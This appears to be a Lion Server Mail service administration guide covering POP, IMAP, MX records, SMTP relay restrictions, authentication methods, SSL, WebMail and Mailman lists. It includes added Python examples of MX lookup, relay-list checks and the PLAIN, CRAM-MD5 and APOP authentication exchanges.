POP is used only for receiving mail, not for sending mail. The POP service is like a post office, storing mail and delivering it to a specific address. Mail service stores incoming POP mail until users connect to Mail service and download their waiting mail. After a user's computer downloads POP mail, the mail is stored only on the user's computer. The user's computer disconnects from Mail service, and the user can read, organize, and reply to the received POP mail. An advantage of using POP is that your server doesn't need to store mail that users have downloaded. Therefore, your server doesn't need as much storage space as it would using IMAP. However, because the mail is removed from the server, if the user's computer sustains damage and loses mail files, there's no way to recover these files without using data backups. Another advantage of POP is that POP connections are transitory. After mail is transferred, the connection is dropped and the load on the network and mail server is removed. POP isn't the best choice for users who access mail from more than one computer, such as a home computer, an office computer, and a laptop while on the road. When a user retrieves mail via POP, the mail is downloaded to the user's computer and is usually removed from the server. If the user logs in later from a different computer, the user can't see previously downloaded mail.
RELATED INFORMATION

Mail screening


User interaction with Mail service


Mail is delivered to its final recipient using a mail user agent (MUA). MUAs are usually referred to as mail clients or mail applications. These mail clients often run on the user's local computer. Each user's mail application must be configured to send messages to the outgoing server and receive messages from the incoming server. These configurations can affect your server's processing load and available storage space. Users can also access mail through Webmail.


Use network services with Mail service


Mail service makes use of network services to ensure delivery of mail.

Before sending mail, your Mail service will probably have a DNS service determine the Internet Protocol (IP) address of the destination. The DNS service is necessary because people typically address their outgoing mail by using a domain name, such as example.com, rather than an IP address, such as 198.162.12.12. To send an outgoing message, Mail service must know the IP address of the destination. Mail service relies on a DNS service to look up domain names and determine the corresponding IP addresses. The DNS service can be provided by your ISP or by Lion Server. Additionally, a mail exchange (MX) record can provide redundancy by listing an alternate mail host for a domain. If the primary mail host isn't available, the mail can be sent to the alternate mail host. An MX record can list several mail hosts, each with a priority number. If the lowest priority host is busy, mail can be sent to the host with the next lowest priority, and so on. Without a properly configured MX record in DNS, mail might not reach your intended server.

How Mail service uses DNS

1. The sending server reads the mail recipient's domain name (what comes after the @ in the To address).
2. The sending server looks up the MX record for that domain name to find the receiving server.
3. If the MX record is found, the message is sent to the receiving server.
4. If the lookup fails to find an MX record for the domain name, the sending server assumes that the receiving server has the same name as the domain name, so the sending server does an Address (A) lookup on that domain name and attempts to send the message there.
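The lookup sequence above, carried through in code as an added example (not part of this guide, and not how Postfix is implemented): a dictionary stands in for the DNS server, and example.com, example.org, nohost.example.net and the 198.51.100.x / 203.0.113.x addresses are constructed. Candidates are ordered by MX precedence, a host that is busy falls through to the next precedence, and a domain with no MX record falls back to its own A record, which is also where a typo in the MX record silently sends your mail to the wrong host.

```python
# Constructed zone data standing in for answers from a DNS server (assumption:
# the real Mail service queries DNS; here a dict plays that role).
ZONE = {
    "MX": {
        # (precedence, host); lower numbers are tried first
        "example.com": [(20, "mail2.example.com"), (10, "mail1.example.com")],
    },
    "A": {
        "mail1.example.com": "198.51.100.10",
        "mail2.example.com": "198.51.100.11",
        "example.org": "203.0.113.25",   # no MX record: mail falls back to this A record
        "nohost.example.net": None,      # neither MX nor A: undeliverable
    },
}


def lookup(rtype, name, zone=ZONE):
    """Answer an MX or A query from the constructed zone (None when no record exists)."""
    return zone[rtype].get(name)


def recipient_domain(address):
    """What comes after the @ in the To address, lower-cased."""
    local, sep, domain = address.rpartition("@")
    if not sep or not local or not domain:
        raise ValueError("not a valid mail address: %r" % address)
    return domain.lower()


def delivery_candidates(address, zone=ZONE):
    """Ordered list of (host, ip) a sending server should try, best first."""
    domain = recipient_domain(address)
    mx = lookup("MX", domain, zone)
    if mx:
        # Sort by precedence; hosts of equal precedence would be chosen at random
        # by a real MTA, here they are simply kept in name order.
        hosts = [host for _, host in sorted(mx)]
    else:
        # No MX record: assume the receiving server has the domain's own name.
        hosts = [domain]
    candidates = []
    for host in hosts:
        ip = lookup("A", host, zone)
        if ip:
            candidates.append((host, ip))
    return candidates


def choose_host(address, unavailable=(), zone=ZONE):
    """First candidate that is not currently unavailable, or None if mail cannot be delivered."""
    for host, ip in delivery_candidates(address, zone):
        if host not in unavailable:
            return host, ip
    return None


if __name__ == "__main__":
    print(delivery_candidates("alice@example.com"))
    print(choose_host("alice@example.com", unavailable={"mail1.example.com"}))
    print(delivery_candidates("bob@example.org"))
```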

Mail service setup

Before you set up Mail service


Before setting up Mail service for the first time, complete the following. If you are upgrading from a previous version of Mac OS X Server, you might need to take special steps to upgrade Mail service.

Decide whether to use POP, IMAP, or both for accessing mail.
If your server provides Mail service over the Internet, obtain a registered domain name.
Determine whether your ISP will create your MX records or whether you'll create them using your own DNS service.
Identify the people who will use Mail service but who don't have user accounts in a directory domain accessible to Mail service. Then create user accounts for these mail users.
Determine your authentication and transport security needs.
RELATED INFORMATION

Use network services with Mail service
Provide SMTP authentication
Provide IMAP and POP authentication
Secure Mail service with SSL

Mail service management tools


Lion Server provides two primary applications and one primary command-line tool to help you set up and manage Mail service.

Server Admin: Use to start, stop, configure, maintain, and monitor Mail service when you install Lion Server.
Server app: Use to create user accounts for mail users and configure each user's mail options.
serveradmin: Use to manage Mail service from the command line remotely via ssh or locally through the Terminal application.

Configure DNS for Mail service

Configuring DNS for Mail service entails enabling MX records with your DNS server. If you have an ISP that provides DNS service, contact the ISP so they can enable your MX records. Follow these steps if you provide your own DNS service using Lion Server.

1. In Server Admin, choose a server, then select DNS.
2. Click the Zones button in the toolbar.
3. Select the zone that the MX record will be added to.
4. If there are no zones, create one.
5. If the mail server does not have a machine record (A), add one.
6. Click the + button in the Mail Exchangers list.
7. Enter the mail server's hostname.
8. Set a mail server precedence number. Mail servers try to deliver mail at lower numbered mail servers first.
9. Click OK to Save.

To set up multiple servers for redundancy, add MX records with different precedence numbers.

Automatic configuration of Mail service


You can have Mail service set up and start as part of the Lion Server installation process. An option for setting up Mail service appears in the Setup Assistant application, which runs at the conclusion of the installation process. If you select this option, Mail service is set up as follows:

SMTP, POP, and IMAP are active and use standard ports.
Junk mail filter is on.
Virus filtering is on.
Quotas are not enforced.
Incoming messages larger than 10 MB are refused.
Mailing lists are inactive.
Standard authentication methods are used (not Kerberos), with POP and IMAP set for clear-text passwords (APOP and CRAM-MD5 turned off) and SMTP authentication turned off. If your server is an Open Directory master, Kerberos, CRAM-MD5, and APOP are used.
Mail is delivered only locally. (No mail is sent over the Internet.)
Mail relay is unrestricted.

You can also use the configuration assistant to set up Mail service. This interactive assistant helps you select options and settings. If you use the configuration assistant, you should already have MX records set properly. After using the assistant, you can use Server Admin, Server app, and the serveradmin command-line tool to customize your configuration.

Enable Mail service administration with Server Admin


You must turn on Mail service administration before you can use Server Admin to configure or enable it. This allows Server Admin to start, stop, and change settings for Mail service.

1. Open Server Admin.

2. Select a server, click the Settings button in the toolbar, and then click the Services tab.
3. Select the checkbox for Mail service.

You can now configure and control Mail service using Server Admin.

Mail service configuration

Configure outgoing Mail service


Mail service includes an SMTP service for sending mail. Subject to restrictions that you control, the SMTP service also transfers mail to and from Mail service on other servers. If your mail users send messages to another Internet domain, your SMTP service delivers the outgoing messages to the other domain's Mail service. Other Mail services deliver messages for your mail users to your SMTP service, which then transfers the messages to your POP service and IMAP service.

If you don't choose a method of SMTP authentication or authorize specific SMTP servers to relay for, the SMTP server allows anonymous SMTP mail relay and is considered an open relay. Open relays are bad because junk mail senders can exploit the relay to hide their identities and send illegal junk mail without penalty.

There is a difference between relaying mail and accepting delivery of mail. Relaying mail means passing mail from one (possibly external) mail server or a local user's mail client to another (third) mail server. Accepting delivery means receiving mail from a (possibly external) mail server to be delivered to the server's mail users. Mail addressed to local recipients is still accepted and delivered. Enabling authentication for SMTP requires authentication from any selected authentication method prior to relaying mail. SMTP authentication is used with restricted SMTP mail transfer to limit junk mail propagation.

Enable SMTP access

SMTP is used for transferring mail between Mail services and for sending mail from users' mail clients. The SMTP Mail service stores outgoing mail in a queue until it has found the mail exchange server at the mail's destination. Then it transfers the mail to the destination server for handling and eventual delivery. SMTP service is required for outgoing Mail service and for accepting delivery of mail from mail servers outside your organization.

1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Settings.
3. Select the General tab.
4. Click Enable SMTP.
5. Select Allow incoming mail, if wanted.
6. If you allow incoming mail, enter the domain name to accept mail for and the mail server's host name.
7. Click Save.

By default SMTP is enabled on port 25. If port 25 is blocked in your environment, change the port that SMTP uses.

Require SMTP authentication

If your Mail service requires SMTP authentication, your server cannot be used as an open relay by anonymous users. Someone who wants to use your server as a relay point must first provide the name and password of a user account on your server. Although SMTP authentication applies primarily to mail relay, your local mail users must also authenticate before sending mail. This means your mail users must have mail client software that supports SMTP authentication or they can't send mail to remote servers. Mail sent from external mail servers and addressed to local recipients is still accepted and delivered.

Relaying outgoing mail through another server

Rather than delivering outgoing mail to its destinations, your SMTP Mail service can relay outgoing mail to another server. Normally, when an SMTP server receives a message addressed to a remote recipient, it attempts to send that message to that server or the server specified in the MX record, if it exists. Depending on your network setup, this method of mail transport might not be wanted or even possible. You might then need to relay outbound messages through a specific server. You might need to use this method to deliver outgoing mail through the firewall set up by your organization. In this case, your organization must designate a server for relaying mail through the firewall. This method can be useful if your server has slow or intermittent connections to the Internet. Do not attempt to relay mail through a mail server outside your organization's control without the relay administrator's permission. Trying to do so will label you as a Mail service abuser.

1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Settings.
3. Select the General tab.
4. Click Relay outgoing mail through host and enter the DNS name or IP address of the server that provides SMTP relay.
5. Click Save.

Saving mail messages for monitoring and archival purposes

You can configure Mail service to send a blind carbon copy (Bcc) of each incoming or outgoing message to a user or group. You might want to do this to monitor or archive messages. Senders and receivers of mail don't know that copies of their mail are being archived. You can set up the user or group to receive Bccs using POP, then set up a client mail application to log in periodically and clean out the account by retrieving all new messages. Otherwise, you might want to periodically copy and archive the messages from the destination directory using automated shell commands. You can set up filters in the mail client to highlight types of messages. Additionally, you can archive all messages for legal reasons.

1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Settings.
3. Select the General tab.
4. Click the Copy all mail to checkbox and enter a user or group name.
5. Click Save.

RELATED INFORMATION

Provide SMTP authentication
Secure Mail service with SSL

Restrict outgoing mail


You can restrict outgoing mail by allowing only approved hosts to relay mail, rejecting other specific hosts or blacklisted hosts, or filtering your SMTP connections.

Restricting SMTP relay

Your Mail service can restrict SMTP relay by allowing only approved hosts to relay mail. You create the list of approved servers. Approved hosts can relay through Mail service without authenticating. Servers not on the list cannot relay mail through Mail service unless they authenticate first. All hosts, approved or not, can deliver mail to your local mail users without authenticating. Mail service can log connection attempts made by hosts not on your approved list.

1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Settings.
3. Select the Relay tab.
4. Click the Accept SMTP relays only from these hosts and networks checkbox.
5. Edit the list of hosts by choosing one of the following:

Click the Add button (+) to add a host to the list.
Click the Remove button (-) to delete the selected host on the list.
Click the Edit button (/) to change a host on the list.

When adding to the list, Server Admin accepts a variety of notations. You can:

Enter a single IP address or the network/netmask pattern, such as 192.168.40.0/21.
Enter a host name, such as mail.example.com.
Enter an Internet domain name, such as example.com.

The following table describes the results of using restricted SMTP relay and SMTP authentication in various combinations.

SMTP requires authentication   Restricted SMTP relay   Result
On                             Off                     All mail servers must authenticate before Mail service accepts mail for relay. Your local mail users must also authenticate to send mail out.
On                             On                      Approved mail servers can relay without authentication. Servers you haven't approved can relay after authenticating with Mail service.
Off                            On                      Mail service can't be used for open relay. Approved mail servers can relay (without authenticating). Servers that you haven't approved can't relay unless they authenticate, but they can deliver to your local mail users. Your local mail users don't need to authenticate to send mail. This is the most common configuration.
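The relay-list notations and the table above, as an added example that is not part of this guide and is not Postfix's own access-control code: parse_entry classifies an entry as a single address, a network/netmask pattern, or a host or domain name; matches_any tests a connecting client against the list (a name entry is matched against the client's reverse-resolved host name, which the example assumes is available to the server); may_relay reproduces the rows of the table, and classify adds the distinction the text draws between accepting delivery for local recipients and relaying. The approved list, local domain and client addresses used here are constructed.

```python
import ipaddress
import re

# A host or domain name: labels of letters, digits and hyphens joined by dots.
HOSTNAME_RE = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)+$")


def parse_entry(entry):
    """Classify one relay-list entry: a single IP or network/netmask pattern
    (192.168.40.0/21), or a host name / domain name (mail.example.com, example.com).
    Returns ("net", ip_network) or ("name", str)."""
    entry = entry.strip().lower()
    try:
        # A bare address becomes a /32 (or /128) network, so one path handles both.
        return ("net", ipaddress.ip_network(entry, strict=False))
    except ValueError:
        pass
    if HOSTNAME_RE.match(entry):
        return ("name", entry)
    raise ValueError("unrecognised relay list entry: %r" % entry)


def matches_any(client_ip, client_host, entries):
    """True if the connecting client matches an entry. A name entry matches the
    client's (assumed reverse-resolved) host name exactly or as a parent domain,
    so "example.com" covers mx.example.com but not example.com.evil.test."""
    addr = ipaddress.ip_address(client_ip)
    host = (client_host or "").lower().rstrip(".")
    for entry in entries:
        kind, value = parse_entry(entry)
        if kind == "net" and addr in value:
            return True
        if kind == "name" and host and (host == value or host.endswith("." + value)):
            return True
    return False


def may_relay(client_ip, client_host, authenticated, require_auth, restricted_relay, approved):
    """Relay decision for the combinations in the table above."""
    if authenticated:
        return True      # an authenticated session may relay in every configuration
    if restricted_relay and matches_any(client_ip, client_host, approved):
        return True      # approved hosts relay without authenticating
    if require_auth or restricted_relay:
        return False     # everyone else must authenticate first
    return True          # neither control enabled: anonymous relay, i.e. an open relay


def classify(client_ip, client_host, recipient, local_domains, authenticated,
             require_auth, restricted_relay, approved):
    """'deliver' for a local recipient (always accepted), 'relay' when the table
    allows it, otherwise 'reject'."""
    domain = recipient.rpartition("@")[2].lower()
    if domain in {d.lower() for d in local_domains}:
        return "deliver"
    if may_relay(client_ip, client_host, authenticated, require_auth, restricted_relay, approved):
        return "relay"
    return "reject"


# Constructed approved list using each notation the text describes.
APPROVED = ["192.168.40.0/21", "mail.partner.example", "example.com"]

if __name__ == "__main__":
    for ip, host in [("192.168.47.200", None), ("203.0.113.9", "mx.example.com"), ("203.0.113.9", None)]:
        print(ip, host, "->", classify(ip, host, "someone@elsewhere.test", ["example.com"],
                                      False, False, True, APPROVED))
```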

Rejecting SMTP connections from specific servers

Mail service can reject unauthorized SMTP connections from hosts on a disapproved hosts list that you create. Mail from hosts on this list is denied and the SMTP connections are closed after posting a 554 SMTP connection refused error.

1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Settings.
3. Select the Relay tab.
4. Click the Refuse all messages from these hosts and networks checkbox.
5. Edit the list of hosts by choosing one of the following:

Click the Add button (+) to add a host to the list.
Click the Remove button (-) to delete a host on the list.
Click the Edit button (/) to change a host on the list.

When adding to the list, Server Admin accepts a variety of notations. You can:

Enter a single IP address or the network/netmask pattern, such as 192.168.40.0/21.
Enter a host name, such as mail.example.com.
Enter an Internet domain name, such as example.com.

Rejecting mail from blacklisted senders

Mail service can reject mail from SMTP servers that are blacklisted as open relays by a Real-time Blacklist (RBL) Server. Mail service uses an RBL server that you specify. RBLs are sometimes called black-hole servers. Blocking unsolicited mail from blacklisted senders might not be completely accurate. Sometimes it prevents valid mail from being received.

1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Settings.
3. Select the Relay tab.
4. Click the Use these junk mail rejection servers checkbox.
5. Edit the list of servers by adding the DNS name of an RBL server:

Click the Add button (+) to add a server to the list, then enter the domain name of an RBL server, such as rbl.example.com.
Click the Remove button (-) to delete the server from the list.
Click the Edit button (/) to change the server.

When adding to the list, Server Admin accepts a variety of notations. You can:

Enter a single IP address or the network/netmask pattern, such as 192.168.40.0/21.
Enter a host name, such as mail.example.com.
Enter an Internet domain name, such as example.com.

Filtering SMTP connections

You can use Lion Server Firewall service to allow or deny access to your SMTP Mail service from specific IP addresses. Filtering disallows communication between an originating host and your mail server. Mail service doesn't receive the incoming connection and no SMTP error is generated or sent back to the client.

1. In Server Admin, select Firewall in the Computers & Services pane.
2. Create a firewall IP filter using the instructions in Network Services Administration, using the following settings:

Access: denied
Port number: 25 (or your incoming SMTP port, if you use a nonstandard port)
Protocol: TCP
Source: the IP address or address range you want to block
Destination: your mail server's IP address

3. If you want, log the packets to monitor the SMTP abuse.
4. Add more filters for the SMTP port to allow or deny access from other IP addresses or address ranges.

Provide SMTP authentication


You can protect your server from being an open relay (which indiscriminately relays mail to other mail servers) by requiring SMTP authentication. Requiring authentication ensures that only known users (people with user accounts on your server) can send mail from your mail servers. You can configure Mail service to require secure authentication using CRAM-MD5, Kerberos, or less secure authentication methods using plain text or login. Plain authentication sends mail passwords as plain text over the network. Login authentication sends a minimally secure crypt hash of the password over the network. You might allow these less secure authentication methods, which don't encrypt passwords, if some users have mail client software that doesn't support secure methods. If you configure Mail service to require CRAM-MD5, mail users' accounts must be set to use a password server that has CRAM-MD5 enabled. Before enabling Kerberos authentication for incoming Mail service, you must integrate Mac OS X with a Kerberos server. If you're using Lion Server for Kerberos authentication, this is already done for you. Enabling SMTP authentication will:

Make your users authenticate with their mail client before accepting mail to send.
Frustrate mail server abusers who are trying to send mail through your system without your consent.

Enabling multiple methods allows a client to use any of the enabled methods. To require any of these authentication methods, enable only one method.

To allow secure SMTP authentication

1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Settings.
3. Select the Advanced tab.
4. Select Security.
5. Click the CRAM-MD5 or Kerberos checkbox in the SMTP section.
6. Click Save.

To allow less secure authentication

1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Settings.
3. Select the Advanced tab.
4. Select Security.
5. In the SMTP section, click the Plain or Login checkbox.
6. Click Save.

If you use the Server Setup Assistant and make your server an Open Directory Master, Kerberos and CRAM-MD5 are enabled. To force only one method to be used for authentication, deselect the one you do not want used.

Configure incoming Mail service


When configuring incoming Mail service, you configure mail to be retrieved by users and mail client applications. Configuring incoming Mail service involves these basic steps:

Choose and enable the type of access (POP, IMAP, or both).
Choose a method for authentication of the mail client.
Choose a policy for secure transport of mail data over SSL.

The following sections explain how to enable IMAP and POP access.

Enable IMAP access

IMAP is a client-server mail protocol that allows users to access mail from the Internet. With IMAP, mail is delivered to the server and stored in a remote mailbox on the server. To users, mail appears as if it were on the local computer. A key difference between IMAP and POP is that with IMAP the mail isn't removed from the server until the user deletes it. IMAP connections are persistent and remain open, maintaining load on the server and possibly the network as well.

1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Settings.
3. Select the General tab.
4. Click Enable IMAP.
5. Enter the number of concurrent connections you want to allow, then click Save.
6. Click Save.
7. Continue and configure security for IMAP authentication and transport.

Enable POP access

POP is used for receiving mail. The POP Mail service stores incoming POP mail until users have their computers connect to Mail service and download their waiting mail. After a user's computer downloads POP mail, the mail is stored only on the user's computer. An advantage of using POP is that your server doesn't need to store mail that users have downloaded. POP isn't the best choice for users who access mail from more than one computer, such as a home computer, an office computer, and a laptop while on the road, because after messages are accessed by one computer, they are deleted from the server.

1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Settings.
3. Select the General tab.
4. Click Enable POP.
5. Click Save.
6. Continue and configure security for IMAP authentication and transport.

Choose no incoming mail retrieval

You can choose SMTP Mail service but not supply POP or IMAP service for incoming mail retrieval. If neither POP nor IMAP is enabled, incoming mail from other mail servers is still delivered to users but they can't access their mail with their mail client applications. Mail accepted for local delivery is queued until POP or IMAP services are enabled, delivery to /var/mail/ is enabled, or the message expires and a Non Delivery Receipt (NDR) is sent to the sender (after 72 hours by default). If delivery to /var/mail/ is enabled, users can still access mail using UNIX mail tools such as PINE or ELM. Messages delivered to /var/mail/ are not available for delivery to users with Dovecot if POP or IMAP are enabled again. If POP and IMAP are disabled, you can change where incoming mail is stored from its default location at /Library/Server/Mail/Data/mail/GUID to /var/mail/username.

1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Settings.
3. Select the General tab.
4. Click the Deliver to /var/mail/ checkbox.
5. Click Save.

Save mail messages for monitoring and archival purposes

You can configure Mail service to send a blind carbon copy (Bcc) of each incoming or outgoing message to a user or group. You might want to do this to monitor or archive messages. Senders and receivers of mail don't know that copies of their mail are being archived. You can set up the user or group to receive Bccs using POP, then set up a client mail application to log in periodically and clean out the account by retrieving all new messages. Otherwise, you might want to periodically copy and archive the messages from the destination directory using automated shell commands. You can set up filters in the mail client to highlight types of messages. Additionally, you can archive all messages for legal reasons.

1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Settings.
3. Select the General tab.
4. Click the Copy all mail to checkbox and enter a user or group name.
5. Click Save.

RELATED INFORMATION

Provide IMAP and POP authentication
Secure Mail service with SSL

Provide IMAP and POP authentication


Your IMAP/POP Mail service (Dovecot) can protect user passwords by requiring that connections use secure authentication using Kerberos, CRAM-MD5 (for IMAP), or APOP (for POP), or less secure authentication methods using plain text or login. When a user connects with secure authentication, the user's mail client software encrypts the user's password before sending it to your IMAP service. Plain authentication sends mail passwords as plain text over the network. Login authentication sends a minimally secure crypt hash of the password over the network. You might allow these less secure authentication methods, which don't encrypt passwords, if some users have mail client software that doesn't support the secure methods. Make sure your users' mail applications and user accounts support the method of authentication you choose. If you configure Mail service to require CRAM-MD5, you must set mail accounts to use a Lion Server Password Server that has CRAM-MD5 enabled. Before enabling Kerberos authentication for incoming Mail service, you must integrate Mac OS X with a Kerberos server. If you're using Lion Server for Kerberos authentication, this is already done for you. Enabling SMTP Authentication will:

Make your users authenticate with their mail client before accepting mail to send.
Frustrate mail server abusers who are trying to send mail through your system without your consent.

Enabling multiple methods allows a client to use any of the enabled methods. To require any of these authentication methods, enable only one method.

To set secure IMAP and POP authentication

1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Settings.
3. Select the Advanced tab.
4. Select Security.
5. Select CRAM-MD5 or Kerberos (as needed) in the IMAP section.
6. Click Save.

To set less secure IMAP and POP authentication

1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Settings.
3. Select the Advanced tab.
4. Select Security.
5. Click the Login, PLAIN, or Clear checkbox in the IMAP list.
6. Click Save.

If you use the Server Setup Assistant and make your server an Open Directory Master, Kerberos, CRAM-MD5 (for IMAP), and APOP (for POP) are enabled. To force only one method to be used for authentication, deselect the one you do not want used.
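To make concrete what the secure and less secure methods in this section and in Provide SMTP authentication above actually send over the wire, here is an added example (not code from this guide, from Postfix or from Dovecot) with both the client and the server side of three mechanisms: PLAIN carries the password itself, only base64-wrapped; CRAM-MD5 answers a server challenge with HMAC-MD5 keyed by the password, so the password never crosses the network and a captured answer is useless against a fresh challenge; APOP answers the timestamp in the POP3 banner with MD5(timestamp + password). The credential store, user name, host name and challenge values are constructed.

```python
import base64
import hashlib
import hmac
import secrets
import time

# Constructed credential store. CRAM-MD5 and APOP can only be verified if the
# server can recompute the digest, so it must hold the password itself; this is
# why the text says the account's password server must have CRAM-MD5 enabled.
PASSWORDS = {"alice": "correct horse battery staple"}


def make_challenge(hostname="mail.example.com"):
    """Fresh server challenge in the <random.time@host> shape used by CRAM-MD5 and APOP."""
    return "<%d.%d@%s>" % (secrets.randbits(32), int(time.time()), hostname)


# --- PLAIN: the password crosses the network, only base64-wrapped -------------

def plain_client_response(user, password):
    """Client line after AUTH PLAIN: base64(NUL user NUL password)."""
    return base64.b64encode(b"\0" + user.encode() + b"\0" + password.encode()).decode()


def plain_server_verify(response):
    _authzid, user, password = base64.b64decode(response).split(b"\0", 2)
    stored = PASSWORDS.get(user.decode())
    return stored is not None and hmac.compare_digest(stored.encode(), password)


def password_visible_in_plain(response):
    """What anyone who can observe a non-SSL connection learns from a PLAIN response."""
    return base64.b64decode(response).split(b"\0", 2)[2].decode()


# --- CRAM-MD5: prove knowledge of the password with HMAC-MD5(password, challenge) ---

def cram_md5_client_response(user, password, challenge):
    digest = hmac.new(password.encode(), challenge.encode(), hashlib.md5).hexdigest()
    return base64.b64encode(("%s %s" % (user, digest)).encode()).decode()


def cram_md5_server_verify(response, challenge):
    user, _, digest = base64.b64decode(response).decode().partition(" ")
    stored = PASSWORDS.get(user)
    if stored is None:
        return False
    expected = hmac.new(stored.encode(), challenge.encode(), hashlib.md5).hexdigest()
    return hmac.compare_digest(expected, digest)


# --- APOP (POP3): MD5(timestamp + password) over the banner's timestamp --------

def apop_client_command(user, password, timestamp):
    return "APOP %s %s" % (user, hashlib.md5((timestamp + password).encode()).hexdigest())


def apop_server_verify(command, timestamp):
    parts = command.split()
    if len(parts) != 3 or parts[0] != "APOP" or parts[1] not in PASSWORDS:
        return False
    expected = hashlib.md5((timestamp + PASSWORDS[parts[1]]).encode()).hexdigest()
    return hmac.compare_digest(expected, parts[2])


if __name__ == "__main__":
    ch = make_challenge()
    print("S: 334", base64.b64encode(ch.encode()).decode())
    print("C:", cram_md5_client_response("alice", PASSWORDS["alice"], ch))
    print("verified:", cram_md5_server_verify(cram_md5_client_response("alice", PASSWORDS["alice"], ch), ch))
    print("PLAIN reveals:", password_visible_in_plain(plain_client_response("alice", PASSWORDS["alice"])))
```

Note that CRAM-MD5 and APOP protect only the password; the mail itself still travels in clear text unless the connection also uses SSL, which is why the next topic treats transport separately from authentication.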

Secure Mail service with SSL


Secure Sockets Layer (SSL) connections ensure that the data sent between your mail server and your users' mail clients is encrypted. This allows secure and confidential transport of mail messages across a local network. SSL transport doesn't provide secure authentication. It only provides secure transfer from your mail server to your clients. For incoming mail, Mail service supports secure mail connections with mail client software that requests them. If a mail client requests an SSL connection, Mail service can comply if that option is enabled. Mail service still provides non-SSL (unencrypted) connections to clients that don't request SSL. The configuration of each mail client determines whether it connects with SSL or not. For outgoing mail, Mail service supports secure mail connections between SMTP servers. If an SMTP server requests an SSL connection, Mail service can comply if that option is enabled. Mail service can still allow non-SSL (unencrypted) connections to mail servers that don't request SSL.

Configure SSL transport

If Mail service is started from the Server app, the default self-signed certificate is used for SSL transport. You can change this to another certificate if needed.

1. Select your server in the Hardware section of the Server app sidebar.
2. Select the Settings pane.
3. Click the Edit button next to SSL Certificate.
4. Choose the certificate for the SMTP or POP and IMAP server as needed.

RELATED INFORMATION

Replace certificates
Create a self-signed certificate
Import a certificate identity
Obtain a CA-signed certificate
Use an SSL certificate

Change Mail service settings from the command line


Most settings are exposed in Server Admin and can be changed there. Many settings can also be accessed through the serveradmin command-line tool. Find the name of the setting to change and then submit your setting as an argument to serveradmin. For example, to disable POP email service:

$ sudo serveradmin settings mail:imap:enable_pop = no
$ sudo serveradmin stop mail
$ sudo serveradmin start mail

If you make a change, you may need to stop and restart Mail service. For more specific configuration of Postfix and Dovecot you might want to configure them directly. For information about configuring these tools, see the following: For Postfix, see www.postfix.org; for Dovecot IMAP/POP, see www.dovecot.org.

Enable Webmail
WebMail is a web-based mail user agent (MUA). It allows a web browser such as Apple's Safari to compose, read, and forward mail like any other mail client. Lion Server's WebMail functionality is provided by a software package called Roundcube at roundcube.net. WebMail relies on your mail server to provide the Mail service. WebMail cannot provide Mail service independent of the mail server. WebMail uses the Mail service of your Lion Server computer.

WebMail uses standard mail protocols and requires your mail server to support them. These protocols are:

IMAP, for retrieving incoming mail
SMTP, for exchanging mail with other mail servers (sending outgoing mail and receiving incoming mail)

WebMail doesn't support retrieving incoming mail via POP. Even if your mail server has POP enabled, WebMail doesn't use it.

1. Enable and configure your mail server.
2. Launch Server App from the Launchpad.
3. In the Server app sidebar, select Mail.
4. Check Enable WebMail.

Set up a Mailman mailing list


To set up a Mailman mailing list, you enable the service, define a list name, and add subscribers to the list. When you create a mailing list, you must specify a master password that gives you control over all lists. Do not use an administrator's or user's login password. You must also specify the mail addresses of other administrators who need the master password.

Enable mailing lists

Before you can define mailing lists and subscribers, you must enable the list service and create the administrators' default mailing list. When you enable mailing lists, you also create a password that allows administration of all lists on the server and a special list for mailing list administrators. Mailing list administrators get a copy of the master list password and error notifications.

Note: This list (called Mailman) must exist for mailing lists to function. Do not remove the master list.

1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Settings.
3. Select the Mailing Lists tab.
4. Click Enable Mailman Mailing Lists.
5. Enter the master list password.
6. Enter the mail addresses of the list administrators, then click OK. You must enter at least one administrator who will receive notifications about the mailing list service.
7. Click Save.

The Mailman list is created and the master password is sent to the indicated administrators.

Create a mailing list

Mailing lists distribute a single mail message to multiple recipients. After you create a mailing list, mail sent to the list's address is sent to all subscribers. Mailing lists have list administrators who can change list membership and list features. Lists can be self-subscribing, so list administrators don't need to add and remove subscribers. The subscribers can do so themselves.

Note: Mailing lists cannot be renamed or corrected after creation. This is a limitation of Mailman, the list software used by Lion Server. Although you can change the case of a list name using Mailman's web interface, Server Admin doesn't allow changing the list name in any way. To rename or correct a list name, you must create a list and add existing users to the new list. This results in a Welcome message being sent to all listed users.

1. In Server Admin, select a computer in the Servers list, then s elect Mail.

2. Click Settings.
3. Select the Mailing Lists tab.
4. Under the Lists pane, click the Add button (+).
5. Enter the list's name. The list name is the mail account name that mailing list users send their mail to. The name isn't case sensitive and cannot contain spaces.
6. Enter the list administrator's mail address, then click Edit. If you only enter a name, it must be a username on the server. If you enter username@domain, the administrator doesn't need to be a local user.
7. Click Users May Self Subscribe, if desired.
8. Choose the default language for the list. You can choose English, French, German, Japanese, Korean, Russian, or Spanish. This setting encodes the text generated by the list for the default language.
9. Choose additional languages to be supported by the list. This setting also encodes the text generated by the list for the default language.
10. Click OK.
11. Click Save.

You can now add subscribers to the list. If you allow users to self-subscribe, they can subscribe using mail or the web administration page.

Set a mailing list's maximum message length

You can set the maximum size message that the list accepts. You can disallow large attachments by setting a small maximum size, or you can allow file collaboration by setting an unlimited message size.

1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Settings.
3. Select the Mailing Lists tab.
4. Select the list whose message length you want to set.
5. Under the Lists pane, click the Edit button (/).
6. Enter the maximum message length (in KB). If you enter 0, the maximum length is unlimited.
7. Click OK.
8. Choose the default language for the list. You can choose English, French, German, Japanese, Korean, Russian, or Spanish. This setting encodes the text generated by the list for the default language.
9. Choose additional languages to be supported by the list. This setting also encodes the text generated by the list for the default language.
10. Click OK.
11. Click Save.

Create a mailing list description

